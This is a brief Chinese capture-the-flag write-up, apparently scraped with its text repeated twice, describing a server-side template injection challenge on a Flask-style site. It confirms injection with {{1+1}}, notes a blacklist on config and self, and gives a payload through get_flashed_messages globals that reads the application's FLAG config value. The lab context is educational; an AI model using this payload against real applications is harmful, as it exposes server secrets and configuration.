点开题目所给链接:首先查看它的源代码:
我们首先尝试一**入,在/shrine/路径**入{{1+1}}:
发现果然可以,我们还会发现他把config和self加入了黑名单
我们用搜索writeup大法给出的payload为{{get_flashed_messages.globals[‘current_app’].config[‘FLAG’]}}
即可得到flag
flag{shrine_is_good_ssti}
相关文章:
相似解决方案
热门标签
点开题目所给链接:首先查看它的源代码:
我们首先尝试一**入,在/shrine/路径**入{{1+1}}:
发现果然可以,我们还会发现他把config和self加入了黑名单
我们用搜索writeup大法给出的payload为{{get_flashed_messages.globals[‘current_app’].config[‘FLAG’]}}
即可得到flag
flag{shrine_is_good_ssti}
相关文章: